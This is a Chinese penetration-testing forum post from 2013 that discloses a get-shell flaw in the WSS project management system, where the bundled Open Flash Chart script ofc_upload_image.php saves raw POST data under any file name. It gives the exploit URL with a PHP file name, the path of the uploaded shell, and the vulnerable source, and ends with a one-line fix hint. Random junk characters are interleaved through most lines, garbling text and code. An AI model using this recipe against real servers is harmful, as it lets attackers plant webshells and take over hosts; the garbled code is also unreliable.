中国网络渗透测试联盟

标题: WSS项目管理系统Post get shell [打印本页]
作者: admin    时间: 2013-2-23 12:38
标题: WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存- R% g9 G: o# [. ?
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
! |$ N3 N8 \5 N( V! M2 J  f% ^8 ^" [" e5 c. X! [5 Q% z
利用:
; Z, e8 P. u5 k1 Y+ c: ^7 Q/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名: b1 p9 e! {% g3 _  m" K
2 H9 @  G4 R( E$ x4 a0 T/ \9 _
Post任意数据# P' O5 h5 K3 Z, {" A4 m* Y
保存位置http://localhost/chart/tmp-upload-images/hfy.php% t* a7 Y! n( I5 X( e# w) {
[attach]201[/attach]1 B4 j0 [: A- [  Y
[attach]202[/attach]5 ^3 C+ K/ g; ?6 ?0 P1 {4 p3 J
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~3 G/ Z7 A( n. `, V
  O, G' Z% M3 R( ]7 j; ^4 \
<?php3 T/ ~! Z5 _$ t5 @. M: ?. K# X

0 d: L' t2 d$ y0 u; y0 {//: B& t- B0 n( @9 V$ u+ i
// In Open Flash Chart -> save_image debug mode, you
# R& v4 e* C) ^" Z3 l$ r// will see the 'echo' text in a new window.
3 E( f8 A8 b2 B' |/ w' o7 M; g3 c//; o5 G2 H1 g& _/ G6 \/ q
0 {) a* ^$ g/ P9 W( N3 y
/*( c' E( ?! v1 N2 S

) J  m+ }- t' m$ m7 _: v8 M; ~) H+ a6 oprint_r( $_GET );
, h% @6 q( h2 i3 Nprint_r( $_POST );
' w2 i6 u5 x: p3 n' z0 v$ Wprint_r( $_FILES );7 w. B; [& k0 i- K/ j" S% I

( B7 S7 F3 P' a7 W" a  h+ s* xprint_r( $GLOBALS );
( f. \! O( a7 Z) \3 t1 Uprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );1 q  d  f; L5 s
, }. y0 f# d7 V( t, B
*/
* Y( R# T% d* D; Z0 N// default path for the image to be stored /// p9 }/ N! b2 R( d  ]7 N  R0 k" {
$default_path = '../tmp-upload-images/';1 Z6 A! R- M. B/ A( e! U. I) J

3 T* Z& }  k# t8 |2 Tif (!file_exists($default_path)) mkdir($default_path, 0777, true);, |! f( p0 B" z9 J5 k  X! d; E; b

+ D( K' i; {6 k. [5 Q9 s// full path to the saved image including filename //+ ]0 Q' w* ]+ u) r5 r. a
$destination = $default_path . basename( $_GET[ 'name' ] ); 0 O+ ^6 l6 W, h6 p  K4 R

& }$ E  k2 `0 n1 J8 Decho 'Saving your image to: '. $destination;
8 |0 S2 G3 t5 h( W" v// print_r( $_POST );
$ |! X% y; S! q3 p/ f// print_r( $_SERVER );
8 _9 e. R# V6 }, z: i// echo $HTTP_RAW_POST_DATA;4 O: ~  q2 _' j5 \

% v% L& Q+ D# B1 U. V* {  g//
' |8 z+ O- P4 j9 p# C* S// POST data is usually string data, but we are passing a RAW .png' \2 E; t5 h9 a8 p
// so PHP is a bit confused and $_POST is empty. But it has saved, J7 ^- {6 E; s2 H/ \: @
// the raw bits into $HTTP_RAW_POST_DATA7 R  \" w4 c6 V6 V
//3 h" W6 j! k# f( a+ B
8 {3 E% ~- `% f+ s  D( i( d
$jfh = fopen($destination, 'w') or die("can't open file");1 m+ P. i' f) h. z/ @
fwrite($jfh, $HTTP_RAW_POST_DATA);
7 C' q, f6 b( s) m4 Afclose($jfh);
1 \# C3 ~7 A$ q- v4 m  f# x9 d+ L% E1 ], Z$ b
//! y5 o5 J6 p( \% r6 Z5 r" P9 o
// LOOK:, O2 u! r1 \/ A6 B
//
  o- f* a2 f  Oexit();4 b5 l# ?2 x7 J  H
//1 y4 t0 i* k1 C: k% {3 S5 P: y
// PHP5:
3 F  P: V' y7 y9 F+ \! u: k//$ ]; ~, c" E# b4 _! Q, S! n0 T! u2 o
. A* }, r9 D7 R6 V6 }

* M9 _9 x9 d1 ~+ _5 G. t/ F- k// default path for the image to be stored //+ Z% d9 D: g( r7 O% n
$default_path = 'tmp-upload-images/';
+ z* T# g. t6 Q2 X
3 J1 }& ]' O! a$ F  d1 t4 A& pif (!file_exists($default_path)) mkdir($default_path, 0777, true);* c/ e: \! ^; l

6 \5 m# @- S# `! d$ y) g// full path to the saved image including filename //) B: E' W2 I, ]0 t. g) N( B
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); , B) V, H0 b, }9 n7 N! P. E! S

: c" m' _0 h! }- m6 e7 j( I' Y# p// move the image into the specified directory //
8 G+ b; @& l$ }3 }if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
& O5 b$ [/ J+ w8 [0 G    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";( ~, ?. ^/ M6 k. n4 D
} else {
, g: p4 r7 f0 X( \6 ?    echo "FILE UPLOAD FAILED";7 T# N' G& S8 h. E3 e. k5 m
}
( M& h% g0 f) g% E6 D, f1 D( B7 s+ v5 g' {; j1 k

( r  Q5 H* P% F/ |7 Q/ P?>
, j7 ?; \# v* m
( M( k8 @0 s9 N( ]3 ]- ]& W* a- d" `; z) \
, ?; `+ Z3 {6 F7 r

& i( \  b; Z# P[attach]203[/attach]
) W1 M( x  m; B$ W9 o8 V: r5 l, j& P* L
修复方案:
  I6 I5 j" F- q. w/ t4 e这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 / d6 Y9 u/ X; H) v; `
8 b% d* ^$ z. K. F$ B( g
  E$ ^7 ?- _/ B3 A7 N

$ i2 X& M  W" @0 ~6 x/ ?# `8 i' S1 |" a# _7 Y; l7 [1 G6 S




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2